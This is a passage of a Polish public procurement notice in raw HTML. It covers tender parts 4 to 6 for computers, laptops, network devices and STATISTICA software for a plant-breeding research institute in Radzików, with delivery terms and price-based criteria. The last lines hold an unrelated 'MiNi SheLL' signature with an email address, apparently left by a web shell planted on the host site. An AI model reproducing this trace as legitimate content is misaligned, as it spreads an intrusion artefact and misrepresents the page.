Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;

Dla Pakietu 4 - załącznik nr 2/4
Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 

Dla Pakietu 4 - załącznik nr 2a/4 
Zamawiający podzielił zamówienie na części i dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia tj. na jeden lub więcej pakietów.
2. KOD CPV: 

30 23 20 00-4 sprzęt peryferyjny,
32 42 00 00-3 urządzenia sieciowe,
§ 4. Termin wykonania zamówienia
1).	Termin realizacji zamówienia: max. 31 dni od daty zawarcia umowy.
2).	Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.20.00-4, 32.42.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5; Dostawa komputerów przenośnych z oprogramowaniem,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:

Pakiet 5; Dostawa komputerów przenośnych z oprogramowaniem,

Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;

Dla Pakietu 5 - załącznik nr 2/5

Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 

Dla Pakietu 5 - załącznik nr 2a/5 
Zamawiający podzielił zamówienie na części i dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia tj. na jeden lub więcej pakietów.
2. KOD CPV: 
30 21 31 00-6 komputery przenośne,
30 21 32 00-7 laptopy,
30 24 10 00-0 oprogramowanie komputerowe,
§ 4. Termin wykonania zamówienia
1).	Termin realizacji zamówienia: max. 31 dni od daty zawarcia umowy.
2).	Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.32.00-7, 30.24.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6; Oprogramowanie STATISTICA pakiet zaawansowany,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:

Pakiet 6; Oprogramowanie STATISTICA pakiet zaawansowany,
Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;
Dla Pakietu 6 - załącznik nr 2/6
Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 

Dla Pakietu 6 - załącznik nr 2a/6 
Zamawiający podzielił zamówienie na części i dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia tj. na jeden lub więcej pakietów.
2. KOD CPV: 

30 24 10 00-0 oprogramowanie komputerowe,

§ 4. Termin wykonania zamówienia
1).	Termin realizacji zamówienia: max. 21 dni od daty zawarcia umowy.
2).	Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.24.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com